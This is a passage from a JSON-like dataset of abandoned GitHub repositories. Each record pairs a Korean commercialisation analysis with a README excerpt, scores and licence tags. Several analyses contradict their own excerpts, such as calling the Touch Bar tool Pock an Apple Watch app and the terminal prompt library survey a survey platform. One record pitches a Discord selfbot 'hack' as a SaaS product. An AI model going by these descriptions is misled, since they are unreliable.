和面试者坐在一起，看一些实际的代码，解决一些实际的问题。并且用一整天的时间，让团队所有成员轮流和面试者进行结对编程。虽然如此，但是一些技术问题仍然可以用来很好地启动一段有深度的谈话，能够让面试者和面试官相互都有更加深入的了解。\n\n这个仓库包含了可以用来考核面试者的一系列后端面试题。但绝不是说，面试官必须用每个面试题来考核面试者（这样可能要耗费好几个小时）。根据你期望面试者拥有的技能，从这个列表中有选择的挑一些题目，可以帮助你在特定技能上考核面试者。\n\n应当承认的是，这个项目的灵感来自于[@darcyclarke](https://github.com/darcyclarke)的文章[Front-end Job Interview Questions](https://github.com/darcyclarke/Front-end-Developer-Interview-Questions)\n\n**注意:** 请记住，这些面试题中有许多问题是开放式的，能引导讨论一些有趣的问题。相比那些有直接答案的问题来说，这种问题能够让你对面试者的能力有更多的了解。再一次强调，我认为仅仅是问问题是不够的。要通过与面试者较长时间的结对编程来完成面试: 这是你们相互了","composite_score":0.3153,"license_safety_tag":"restricted"},{"name":"purifycss/purifycss","github_url":"https://github.com/purifycss/purifycss","stars":7,"language":"JavaScript","license":"mit","abandonment_months":68,"description":"# PurifyCSS 사업화 분석\n\n## 왜 보물인가\n웹사이트에서 사용하지 않는 불필요한 디자인 코드를 자동으로 제거해 로딩 속도를 빠르게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 최적화 SaaS**: 기업들이 자신의 사이트 속도를 개선하도록 도와주는 구독형 서비스\n2. **웹 에이전시 내부 도구**: 디자인 회사들이 클라이언트 웹사","readme_excerpt":"# PurifyCSS  \n\n[![Travis](https://img.shields.io/travis/purifycss/purifycss/master.svg)]()\n[![npm](https://img.shields.io/npm/dm/purify-css.svg)]()\n[![David](https://img.shields.io/david/purifycss/purifycss.svg)]()\n![Join the chat at https://gitter.im/purifycss/purifycss](https://badges.gitter.im/purifycss/purifycss.svg)\n\n\nA function that takes content (HTML/JS/PHP/etc) and CSS, and returns only the **used CSS**.  \nPurifyCSS does not modify the original CSS files. You can write to a new file, like minification.  \nIf your application is using a CSS framework, this is especially useful as many selectors are often unused.\n\n### Potential reduction\n\n* [Bootstrap](https://github.com/twbs/bootstrap) file: ~140k\n* App using ~40% of selectors.\n* Minified: ~117k\n* Purified + Minified: **~35k**\n\n\n## Usage\n\n### Standalone\n\nInstallation  \n\n```bash\nnpm i -D purify-css\n```\n\n```javascript\nimport purify from \"purify-css\"\nconst purify = require(\"purify-css\")\n\nlet content = \"\"\nlet css = \"\"\nlet options = ","composite_score":0.3153,"license_safety_tag":"safe"},{"name":"aivivn/Machine-Learning-Yearning-Vietnamese-Translation","github_url":"https://github.com/aivivn/Machine-Learning-Yearning-Vietnamese-Translation","stars":5,"language":"Python","license":"unknown","abandonment_months":56,"description":"# aivivn/Machine-Learning-Yearning-Vietnamese-Translation 분석\n\n## 왜 보물인가\n기계학습 입문자들을 위한 안드류 응의 저명한 교재를 베트남어로 번역한 것으로, 비영어권 학습자들이 AI 기초를 쉽게 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼**\n베트남어권 학생을 대","readme_excerpt":"# Dự án dịch sách [Machine Learning Yearning](https://www.mlyearning.org/)\n\n![](./book_cover.png)\n\n## Bản đầy đủ các chương đã dịch xong\n\n### Online\n* [Tiếng Việt](./chapters/book_vn.md)\n* [Song ngữ Anh-Việt](./chapters/book_en_vn.md)\n\n### Ebook\n* [Tiếng Việt](./chapters/book_mly_with_cover_vn.pdf)\n* **Hiện tại bản ebook song ngữ bị lỗi, nhóm sẽ cập nhật trong thời gian sớm nhất**\n\n### Những người thực hiện\n[Nhóm dịch thuật Machine Learning Cơ Bản](https://github.com/mlbvn/ml-yearning-vn/graphs/contributors)\n\n## Bảng thuật ngữ\nTất cả các thuật ngữ cần được dịch theo chuẩn trong file [glossary](glossary.md).\n\n## Báo lỗi\nNếu bạn đọc gặp bất cứ lỗi nào về cuốn sách: chính tả, cách dịch, hình vẽ, công thức, ..., nhờ bạn [tạo pull request](https://github.com/mlbvn/ml-yearning-vn/pulls) để sửa trực tiếp hoặc [tạo một issue](https://github.com/mlbvn/ml-yearning-vn/issues) thông báo lỗi. Cảm ơn các bạn.\n","composite_score":0.3151,"license_safety_tag":"unknown"},{"name":"wb14123/seq2seq-couplet","github_url":"https://github.com/wb14123/seq2seq-couplet","stars":23,"language":"Python","license":"AGPL-3.0","abandonment_months":22,"description":"","readme_excerpt":"\nThis is a project use seq2seq model to play couplets (对对联)。 This project is written with Tensorflow. You can try the demo at [https://ai.binwang.me/couplet](https://ai.binwang.me/couplet).\n\nPre-requirements\n--------------\n\n* Tensorflow\n* Python 3.6\n* Dataset\n\n\nDataset\n-----------\n\nYou will need some data to run this program, the dataset can be downloaded from [this project](https://github.com/wb14123/couplet-dataset).\n\n** Note: If you are using your own dataset, you need to add `<s>` and `<\\s>` as the first two line into the vocabs file. **\n\nUsage\n------------\n\n### Train\n\nOpen `couplet.py` and config the file locations and hyperparams. Then run `python couplet.py` to train the model. You can see the training loss and bleu score at Tensorbloard. You may need to re-config `learning_rate` when you find the loss stops descresing. Here is an example of the loss graph:\n\n![loss graph](https://user-images.githubusercontent.com/1906051/36624881-50586e54-1950-11e8-8383-232763831cbc.png)\n\nIf you","composite_score":0.3151,"license_safety_tag":"risky"},{"name":"raiden-network/raiden","github_url":"https://github.com/raiden-network/raiden","stars":13,"language":"Python","license":"NOASSERTION","abandonment_months":26,"description":"# Raiden Network 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 이용해 암호화폐 거래를 더 빠르고 저렴하게 만드는 결제 인프라로, 금융 기관과 암호화폐 사업자들이 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래소 및 지갑 서비스**\n- 사용자들이 더 빠르고 저렴하게 돈을 송금할 수 있는 기능 추가\n\n**2. ","readme_excerpt":"<!-- PROJECT SHIELDS -->\n\n[![Raiden](https://user-images.githubusercontent.com/35398162/54018436-ee3f6300-4188-11e9-9b4e-0666c44cda53.png)](https://raiden.network/)\n\n<h4 align=\"center\">\n  Fast, cheap, scalable token transfers for Ethereum\n</h4>\n\n#### Quicklinks\n\n[![Python 3.9](https://img.shields.io/pypi/pyversions/raiden.svg)](https://raiden-network.readthedocs.io/en/stable/)  [![Chat on Discord](https://img.shields.io/discord/948623129796825109.svg)](https://discord.com/invite/nSQDQBq5FC)\n\n- [Getting Started](#getting-started)\n- [Repositories](#repositories)\n- [Contact](#contact)\n\nThe Raiden Network is an off-chain scaling solution, enabling near-instant, low-fee and scalable payments. It's complementary to the Ethereum Blockchain and works with any ERC20 compatible token. The Raiden project is work in progress. Its goal is to research state channel technology, define protocols and develop reference implementations.\n\n>**INFO:** The Raiden client and smart contracts have been [release","composite_score":0.3151,"license_safety_tag":"unknown"},{"name":"babel/example-node-server","github_url":"https://github.com/babel/example-node-server","stars":6,"language":"JavaScript","license":"isc","abandonment_months":41,"description":"# babel/example-node-server 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱의 뒷단 서버를 쉽게 구축할 수 있는 기초 템플릿으로, 개발자들이 처음부터 코딩하지 않고 이를 바탕으로 빠르게 프로젝트를 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 스타트업이 자신의 웹 애플리케이션 백엔드를 이 템플릿으로 ","readme_excerpt":"# Example Node Server w/ Babel\n\n### Getting Started\n\nFirst we'll install `@babel/cli`, `@babel/core` and `@babel/preset-env`.\n\n```shell\n$ npm install --save-dev @babel/cli @babel/core @babel/preset-env\n```\n\nThen we'll create a `.babelrc` file for configuring babel.\n\n```shell\n$ touch .babelrc\n```\n\nThis will host any options we might want to configure `babel` with.\n\n```json\n{\n  \"presets\": [\"@babel/preset-env\"]\n}\n```\n\nThen create our server in `index.js`.\n\n```shell\n$ touch index.js\n```\n```js\nimport http from 'http';\n\nconst server = http.createServer((req, res) => {\n  res.writeHead(200, {'Content-Type': 'text/plain'});\n  res.end('Hello World\\n');\n}).listen(1337, '127.0.0.1');\n\nconsole.log('Server running at http://127.0.0.1:1337/');\n\nexport default server;\n```\n\nWith recent changes to babel, you will need to transpile your ES6 before node can run it.\n\nSo, we'll add our first script, `build`, in `package.json`.\n\n```diff\n  \"scripts\": {\n+   \"build\": \"babel index.js -d dist\"\n  }\n```\n\nThen we'll","composite_score":0.315,"license_safety_tag":"safe"},{"name":"robinvdvleuten/vuex-persistedstate","github_url":"https://github.com/robinvdvleuten/vuex-persistedstate","stars":6,"language":"JavaScript","license":"mit","abandonment_months":52,"description":"# vuex-persistedstate 상용화 분석\n\n## 왜 보물인가\n웹 서비스에서 사용자가 입력한 정보를 자동으로 저장했다가 다시 방문할 때 불러오는 기능을 간단하게 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 설문조사 플랫폼에서 작성 중인 내용을 자동 저장하여 사용자 이탈 방지\n2. **내부 업무 도구*","readme_excerpt":"# vuex-persistedstate\n\nPersist and rehydrate your [Vuex](http://vuex.vuejs.org/) state between page reloads.\n\n<hr />\n\n> 🚨 Not maintained anymore! As I don't use Vue in my day to day work, it becomes very hard to stay up to date with any changes with things like Vuex, Nuxt.js and other tools used by the community. That's why I decided to stop spending my spare time to this repository. Feel free to reach out if you would like to take over ownership of the package on NPM. Thank you for any contribution any of you had made to this project 🙏.\n\n<hr />\n\n[![Build Status](https://img.shields.io/github/workflow/status/robinvdvleuten/vuex-persistedstate/test.svg)](https://github.com/robinvdvleuten/vuex-persistedstate/actions?query=workflow%3Atest)\n[![NPM version](https://img.shields.io/npm/v/vuex-persistedstate.svg)](https://www.npmjs.com/package/vuex-persistedstate)\n[![NPM downloads](https://img.shields.io/npm/dm/vuex-persistedstate.svg)](https://www.npmjs.com/package/vuex-persistedstate)\n[![Pre","composite_score":0.315,"license_safety_tag":"safe"},{"name":"pigigaldi/Pock","github_url":"https://github.com/pigigaldi/Pock","stars":5,"language":"Swift","license":"mit","abandonment_months":43,"description":"# Pock 저장소 분석\n\n## 왜 보물인가\nApple Watch의 알림과 정보를 Mac 화면에서 간편하게 확인하고 관리할 수 있는 생산성 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Mac 사용자를 위한 스마트워치 연동 대시보드 웹 서비스로 제공\n2. **내부 업무 도구**: 회사에서 Apple Watch 알림을 중앙 관리 시스템","readme_excerpt":"<p align=\"center\"><img src=\"https://pock.app/_nuxt/img/pock-icon-big-sur.53a4c62.png\" width=\"96\"/></p>\n<p align=\"center\"><b>Widgets manager for MacBook's Touch Bar</b></p>\n<p align=\"center\">Pock is a free, open-source tool that gives you quick access to your favorite controls and services while maximizing your on-screen real estate</p>\n<p align=\"center\">\n  <img width=\"800\" src=\"https://pock.app/_nuxt/img/pock_widgets.5cf5510.png\"/>\n</p>\n<p align=\"center\">\n  <a href=\"https://pock.app/download?file=pock_0_9_0__22.zip\">Download</a>\n  |\n  <a href=\"https://github.com/pock/pock\">GitHub</a>\n  |\n  <a href=\"https://www.producthunt.com/posts/pock\">ProductHunt</a>\n  |\n  <a href=\"https://pock.app/docs/catalina\">Permissions</a>\n  |\n  <a href=\"https://github.com/pock/pock/releases/tag/0.9.0-22\">Changelog</a>\n</p>\n\n\n\n\n## Thank you!\n\nIf you want to support this project, you can [click here](https://paypal.me/pigigaldi)!\nPock will always be available as free software!\n\n\n\n## How to install\n\n 1. Go to th","composite_score":0.3149,"license_safety_tag":"safe"},{"name":"php-pm/php-pm","github_url":"https://github.com/php-pm/php-pm","stars":5,"language":"PHP","license":"mit","abandonment_months":30,"description":"# PHP-PM 저장소 분석\n\n## 왜 보물인가\n웹사이트를 더 빠르게 실행시켜주는 기술로, 온라인 서비스의 속도 경쟁에서 비용 효율적인 우위를 확보할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월간 구독형 웹 애플리케이션의 응답 속도를 2배 이상 개선하여 사용자 만족도 향상\n- **내부 업무 도구**: 기업의 업무 관리 시스템(E","readme_excerpt":"PPM - PHP Process Manager\n====================================================\n\n<p align=\"center\">\n<img src=\"https://avatars3.githubusercontent.com/u/11821812?v=3&s=200\" />\n</p>\n\nPHP-PM is a process manager, supercharger and load balancer for PHP applications.\n\n![Build Status](https://github.com/php-pm/php-pm/workflows/CS%20&%20PHPStan%20&%20Phpunit%20&%20Integration%20Tests/badge.svg)\n[![Gitter](https://badges.gitter.im/php-pm/php-pm.svg)](https://gitter.im/php-pm/php-pm?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nIt's based on ReactPHP and works best with applications that use request-response frameworks like Symfony's HTTPKernel.\nThe approach of this is to kill the expensive bootstrap of PHP (declaring symbols, loading/parsing files) and the bootstrap of feature-rich frameworks. See Performance section for a quick hint.\nPHP-PM basically spawns several PHP instances as worker bootstraping your application (eg. the whole Symfony Kernel) and hold it in the memory to be pr","composite_score":0.3149,"license_safety_tag":"safe"},{"name":"xaksis/vue-good-table","github_url":"https://github.com/xaksis/vue-good-table","stars":6,"language":"Vue","license":"mit","abandonment_months":24,"description":"# vue-good-table 보물 분석\n\n## 왜 보물인가\n웹사이트에서 데이터를 표 형태로 깔끔하게 보여주는 도구로, 누구나 쉽게 표를 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 시스템(CRM)에서 거래처 정보를 표 형식으로 정렬하고 검색할 수 있는 기능 제공\n2. **내부 업무 도구**: 회사 직원 급여","readme_excerpt":"# Vue-good-table\n\n[![npm](https://img.shields.io/npm/dm/vue-good-table.svg?style=flat-square)](https://www.npmjs.com/package/vue-good-table)\n[![npm](https://img.shields.io/github/package-json/v/xaksis/vue-good-table.svg?style=flat-square)](https://github.com/xaksis/vue-good-table/releases)\n[![npm](https://img.shields.io/github/license/xaksis/vue-good-table.svg?style=flat-square)](https://github.com/xaksis/vue-good-table/blob/master/LICENSE)\n[![](https://data.jsdelivr.com/v1/package/npm/vue-good-table/badge)](https://www.jsdelivr.com/package/npm/vue-good-table)\n\nAn easy to use, clean and powerful data table for VueJS with essential features like sorting, column filtering, pagination and much more - [xaksis.github.io/vue-good-table/](https://xaksis.github.io/vue-good-table/)\n\n\n| :bangbang: Vue 3 Update |\n|:---------------------------|\n| @borisflesch is working on a Vue 3 compatible version of VGT . Please follow/contribute to his repository as it gets production ready: [vue-good-table-ne","composite_score":0.3148,"license_safety_tag":"safe"},{"name":"Team-BANERUS/poketwo-Autocatcher","github_url":"https://github.com/Team-BANERUS/poketwo-Autocatcher","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":12,"description":"# Team-BANERUS/poketwo-Autocatcher 분석\n\n## 왜 보물인가\n포켓몬 게임에서 반복되는 포켓몬 잡기 작업을 자동으로 해주는 도구로, 게이머들의 시간 낭비를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게이밍 자동화 SaaS**: 포켓몬투 플레이어들을 위한 월 구독형 자동화 서비스로 운영\n2. **게임 커뮤니티 ","readme_excerpt":"<!--\n  Title: Poketwo Autocatcher hack\n Description: Most famous automation autocatcher and Hack for Poketwo with Market Commands and Poketwo Guide and it is Best and Poketwo command with automation. This bot or selfbot automatically catches Pokemon known as Autocatch on Discord. Several other Rich Features to Easily Get Rich in Poketwo - au to-trade , cross-trade , mass release , Market sniper for Poketwo .\n Description2: This specific selfbot was designed to automatically catch Pokemon spawned on Discord by Poketwo bot. It also offers other utility functions to automate features like trading, releasing, ID search, etc. Apart from autocatching, the bot extends its features in every newer version with Easy control.\n  Author: banerus\n  Logo: https://i.imgur.com/85PNo2N.png\n  Tags: discord-bot, discord, selfbot, poketwo-selfbot, poketwo, python, js, pokemon, poketwo-discord-bot, catch-pokemon, poketwo-hack,\n        poketwo discord bot, poketwo discord bot, catch pokemon, poketwo hack, di","composite_score":0.3148,"license_safety_tag":"safe"},{"name":"google-ar/three.ar.js","github_url":"https://github.com/google-ar/three.ar.js","stars":8,"language":"JavaScript","license":"apache-2.0","abandonment_months":99,"description":"# google-ar/three.ar.js 분석\n\n## 왜 보물인가\n스마트폰 카메라로 현실 위에 3D 물체를 띄워서 보여주는 증강현실 기술을 만드는 구글의 공식 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 가구·의류 쇼핑몰이 \"이 소파가 내 집에 어떻게 보일까?\" 실시간 확인 기능 제공\n2. **내부 업무 도구**: 건축 설계사가","readme_excerpt":"# three.ar.js\n\n[![Build Status](http://img.shields.io/travis/google-ar/three.ar.js.svg?style=flat-square)](https://travis-ci.org/google-ar/three.ar.js)\n[![Build Status](http://img.shields.io/npm/v/three.ar.js.svg?style=flat-square)](https://www.npmjs.org/package/three.ar.js)\n[![Build Status](http://img.shields.io/npm/dt/three.ar.js.svg?style=flat-square)](https://www.npmjs.org/package/three.ar.js)\n[![Build Status](http://img.shields.io/npm/l/three.ar.js.svg?style=flat-square)](https://www.npmjs.org/package/three.ar.js)\n\n**A helper three.js library for building AR web experiences that run in WebARonARKit and WebARonARCore.**\n\n<img alt=\"Spawn-at-Surface example, for ARCore\" src=\"examples/screencaps/20170829-arcore-spawnAtSurface-1.gif\" style=\"float: left; object-fit: cover; width: 45%; height: 20em; margin-right: 1em; \"><img alt=\"Spawn-at-Camera example, for ARKit\" src=\"examples/screencaps/20170829-arkit-spawnAtCamera-1.gif\" style=\"width: 45%; height: 20em; object-fit: cover;\">\n\n[WebARon","composite_score":0.3148,"license_safety_tag":"safe"},{"name":"onlyhom/mobileSelect.js","github_url":"https://github.com/onlyhom/mobileSelect.js","stars":6,"language":"TypeScript","license":"mit","abandonment_months":25,"description":"# mobileSelect.js 평가 분석\n\n## 왜 보물인가\n스마트폰에서 날짜나 시간을 선택할 때 필요한 '회전식 선택 바퀴' 기능을 간단하게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달앱·예약앱 SaaS**: 음식 배달이나 병원 예약 앱에서 시간 선택 기능으로 활용\n2. **전자상거래 플랫폼**: 쇼핑몰의 배송 날짜 선택, 상품","readme_excerpt":"<p align=\"center\">\n  <img\n    width=\"130\"\n    src=\"https://github.com/onlyhom/img-folder/blob/master/png/m_logo_orange.png?raw=true\"\n  />\n</p>\n<h1 align=\"center\">Mobile Select</h1>\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/mobile-select\"\n    ><img\n      src=\"https://img.shields.io/npm/v/mobile-select?color=cb0303&logo=npm&label=version\"\n      alt=\"Package version\"\n  /></a>\n  <a href=\"https://github.com/onlyhom/mobile-select/network\"\n    ><img\n      src=\"https://img.shields.io/github/stars/onlyhom/mobile-select.svg?logo=apachespark&logoColor=white&color=blueviolet\"\n      alt=\"GitHub stars\"\n  /></a>\n  <a href=\"https://github.com/onlyhom/mobile-select/network\"\n    ><img\n      src=\"https://img.shields.io/github/forks/onlyhom/mobile-select.svg?logo=github&color=blue\"\n      alt=\"GitHub forks\"\n  /></a>\n  <img\n    src=\"https://img.shields.io/badge/dependencies-none-success.svg\"\n    alt=\"dependencies\"\n  />\n  <a href=\"https://github.com/onlyhom/mobile-select/issues\"\n    ><img\n ","composite_score":0.3143,"license_safety_tag":"safe"},{"name":"AlecAivazis/survey","github_url":"https://github.com/AlecAivazis/survey","stars":12,"language":"Go","license":"mit","abandonment_months":26,"description":"# AlecAivazis/survey 상용화 분석\n\n## 왜 보물인가\n설문조사를 쉽게 만들고 관리할 수 있는 오픈소스 도구로, 기업들이 고객 의견을 수집하는 번거로운 과정을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 설문조사 플랫폼(Typeform, Qualtrics 경쟁) - 중소기업용 저가 설문도구로 제공\n2. **","readme_excerpt":"# Survey\n\n[![GoDoc](http://img.shields.io/badge/godoc-reference-5272B4.svg)](https://pkg.go.dev/github.com/AlecAivazis/survey/v2)\n\nA library for building interactive and accessible prompts on terminals supporting ANSI escape sequences.\n\n⚠️ This project is no longer maintained. For an alternative, please check out: https://github.com/charmbracelet/bubbletea ⚠️\n\nHey everyone! I finally came to terms with the fact that I can no longer dedicate enough time to keep this library alive. \nThis project outgrew my wildest expectations and was such a great experience. If someone else wants to take over maintainence,\nplease reach out\n\n\n<img width=\"550\" src=\"https://thumbs.gfycat.com/VillainousGraciousKouprey-size_restricted.gif\"/>\n\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"github.com/AlecAivazis/survey/v2\"\n)\n\n// the questions to ask\nvar qs = []*survey.Question{\n    {\n        Name:     \"name\",\n        Prompt:   &survey.Input{Message: \"What is your name?\"},\n        Validate: survey.Required,\n    ","composite_score":0.3143,"license_safety_tag":"safe"},{"name":"Ramotion/circle-menu","github_url":"https://github.com/Ramotion/circle-menu","stars":6,"language":"Swift","license":"mit","abandonment_months":47,"description":"# Circle Menu 분석\n\n## 왜 보물인가\n스마트폰이나 웹사이트에서 버튼을 누르면 원형으로 펼쳐지는 메뉴 디자인을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 기반 사진 편집 도구에서 필터·효과를 원형 메뉴로 제공\n2. **내부 업무 도구**: 회사 직원들이 사용하는 앱에서 자주 쓰는 기능(저장","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=circle-menu\"><img src=\"https://github.com/Ramotion/circle-menu/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/circle-menu\">\n<img align=\"left\" src=\"https://github.com/Ramotion/circle-menu/blob/master/circle-menu.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">CIRCLE MENU</h1></p>\n\n<h4>Simple, elegant UI menu with a circular layout and material design animations</h4>\n\n\n___\n\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=circle-menu\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img src=\"https://i.imgur.com/ziSqeSo.png/\" width=\"156\" height=\"28\">","composite_score":0.3142,"license_safety_tag":"safe"},{"name":"dgiot/dgiot","github_url":"https://github.com/dgiot/dgiot","stars":33,"language":"Erlang","license":"Apache-2.0","abandonment_months":14,"description":"# dgiot 저장소 분석\n\n## 왜 보물인가\n사물인터넷(IoT) 기기들을 한곳에서 통합 관리할 수 있는 플랫폼으로, 스마트 팩토리나 스마트홈 시장에서 빠르게 성장하고 있는 분야입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 제조업체가 공장 기계를 구독형으로 원격 모니터링하는 서비스\n2. **내부 업무 도구**: 대형 물류창고의 센서","readme_excerpt":"#  DGIOT Lightweight industrial iot open source platform\n\n[![GitHub Release](https://img.shields.io/github/release/dgiot/dgiot?color=brightgreen)](https://github.com/dgiot/dgiot/releases)\n[![Docker Pulls](https://img.shields.io/docker/pulls/dgiot/dgiot)](https://hub.docker.com/r/dgiot/dgiot)\n[![Community](https://img.shields.io/badge/Community-DGIOT-yellow)](https://www.dgiotcloud.cn/)\n[![QQ群346566935](https://img.shields.io/badge/QQ群-346566935-brightgreen)](https://jq.qq.com/?_wv=1027&k=LipWZvDe)\n[![star](https://gitee.com/dgiiot/dgiot/badge/star.svg?theme=gvp)](https://gitee.com/dgiiot/dgiot/stargazers)\n\n\n[English](./README.md) | [简体中文](./README-CN.md) | [日本語](./README-JP.md) | [русский](./README-RU.md)\n\n\n[github](https://github.com/dgiot?from=git)|[gitee](https://gitee.com/dgiiot)|[Official website](https://www.dgiotcloud.cn/)|[Blog](https://www.dgiotcloud.cn/?cat=19)|[Experience](https://prod.dgiotcloud.cn)|\n\n*DGIOT*  is the first lightweight open source industrial iot continuous i","composite_score":0.3142,"license_safety_tag":"safe"},{"name":"ScienJus/smartqq","github_url":"https://github.com/ScienJus/smartqq","stars":27,"language":"Java","license":"unknown","abandonment_months":102,"description":"# SmartQQ 저장소 분석\n\n## 왜 보물인가\nQQ 메신저를 자동으로 제어할 수 있는 기술로, 중국의 주요 소통 플랫폼과 연결된 마케팅·고객 관리 도구를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중국 기업들을 대상으로 QQ 기반 자동 고객 응답 시스템을 구독 형태로 제공\n2. **내부 업무 도구**: 한중 무역 회사의","readme_excerpt":"# Smart QQ Java\n\n基于 Smart QQ（Web QQ） 的 Api 封装，你可以用这个 Api 制作属于自己的 QQ 机器人！\n\n该项目目前（2016年2月）为止还可以正常使用，我也会尽量一直维护这个项目，[Ruby版][ruby]也是如此。\n\n该项目仅提供了最基本的通信协议，你可以在此基础上实现自己的业务逻辑，包括且不限于：\n\n- 拥有 GUI 的 QQ 客户端（Android 或桌面版）\n- 自动聊天回复的 QQ 机器人，比如[小薇](https://github.com/b3log/xiaov)\n- 汇总聊天记录并同步在云上\n- 通过 QQ 写邮件、发短信、执行远程服务器的命令\n- 等等……\n\n注：由于 Smart QQ 不支持收发图片等功能，所以此 Api 也只可以发送文字消息（不包含 @ 命令）。\n\n### 使用方法\n\n如果你需要将此Api嵌入到别的项目，可以使用Maven依赖：\n\n仓库：\n\n```\n<repository>\n    <id>scienjus-mvn-repo</id>\n    <url>https://raw.github.com/ScienJus/maven/snapshot/</url>\n    <snapshots>\n        <enabled>true</enabled>\n        <updatePolicy>always</updatePolicy>\n    </snapshots>\n</repository>\n```\n\n依赖：\n\n```\n<dependency>\n    <groupId>com.scienjus</groupId>\n    <artifactId>smartqq</artifactId>\n    <version>1.0-SNAPSHOT</version>\n</dependency>\n```\n\n如果你只是想要尝试一下，可以直接Clone本项目并随便写个Main方法运行。\n\n```\npublic class Application {\n\n    public static void main(String[] args) {\n        //创建一个新对象时需要扫描二维码登录，并且传一个处理接收到消息的回调，如果你不需要接收消息，可以传null\n        SmartQQ","composite_score":0.3141,"license_safety_tag":"unknown"},{"name":"facebook/prop-types","github_url":"https://github.com/facebook/prop-types","stars":7,"language":"JavaScript","license":"mit","abandonment_months":25,"description":"# facebook/prop-types 분석\n\n## 왜 보물인가\n웹 애플리케이션 개발 시 데이터 오류를 미리 발견해 버그를 줄이는 검증 도구로, 개발팀의 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 프로젝트 관리 도구에 내장하여 사용자 입력 데이터 자동 검증\n- **내부 업무 도구**: 대기업의 사내 시스템에","readme_excerpt":"# prop-types [![Support Ukraine](https://img.shields.io/badge/Support-Ukraine-FFD500?style=flat&labelColor=005BBB)](https://opensource.fb.com/support-ukraine) [![Build Status](https://travis-ci.com/facebook/prop-types.svg?branch=main)](https://travis-ci.org/facebook/prop-types)\n\nRuntime type checking for React props and similar objects.\n\nYou can use prop-types to document the intended types of properties passed to\ncomponents. React (and potentially other libraries—see the `checkPropTypes()`\nreference below) will check props passed to your components against those\ndefinitions, and warn in development if they don’t match.\n\n## Installation\n\n```shell\nnpm install --save prop-types\n```\n\n## Importing\n\n```js\nimport PropTypes from 'prop-types'; // ES6\nvar PropTypes = require('prop-types'); // ES5 with npm\n```\n\n### CDN\n\nIf you prefer to exclude `prop-types` from your application and use it\nglobally via `window.PropTypes`, the `prop-types` package provides\nsingle-file distributions, which are hos","composite_score":0.3141,"license_safety_tag":"safe"},{"name":"manu354/cryptocurrency-arbitrage","github_url":"https://github.com/manu354/cryptocurrency-arbitrage","stars":6,"language":"JavaScript","license":"gpl-3.0","abandonment_months":49,"description":"# cryptocurrency-arbitrage 상품화 분석\n\n## 왜 보물인가\n여러 암호화폐 거래소의 가격 차이를 자동으로 찾아 매매 기회를 포착하는 도구로, 시간 차이로 인한 손실 없이 수익을 노릴 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 월 구독 모델로 개인 투자자들에게 실시간 거래소 가격 모니터링 대시보드 제공\n2. ","readme_excerpt":"[![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)\n\n# Crypto Arbitrage - a node.js script to help find and act on arbitrage opportunities. \nA cryptocurrency arbitrage opportunity calculator and trading bot. Over 800 currencies and 50 markets.\n\nTo use, go to https://manu354.github.io/cryptocurrency-arbitrage/ (this link no longer links to the old site, download from github to use the tool) , for development install nodejs ^V8.00 and run `npm install` in the folder where the script `main.js` is. To run the program write `node main` or `npm start`. To change market settings, and to add your own markets edit the `settings.js` file.\n\n## Notice: \nI am now only focusing on the trading bot. Unfortunately I am going to keep that code private, and will not have time to work on this public version. Feel free to still make pull requests - I will still take a look at any issues when they pop up.\n\n## Short term **roadmap** \n\n**Hopefully","composite_score":0.314,"license_safety_tag":"restricted"},{"name":"magwo/elevatorsaga","github_url":"https://github.com/magwo/elevatorsaga","stars":5,"language":"JavaScript","license":"mit","abandonment_months":43,"description":"# Elevator Saga 상용화 분석\n\n## 왜 보물인가\n엘리베이터 운영을 최적화하는 알고리즘 게임으로, 빌딩 관리사나 건물주가 실제로 필요한 엘리베이터 효율성 문제를 재미있게 배우고 해결할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 빌딩 관리 SaaS**: 건물 관리업체를 위한 엘리베이터 운영 최적화 솔루션으로 구독형 서","readme_excerpt":"Elevator Saga\n===================\nThe elevator programming game\n\n[Play it now!](http://play.elevatorsaga.com/)\n\nOr [Run the unit tests](http://play.elevatorsaga.com/test/)\n\nFor developers/contributors: This project is not 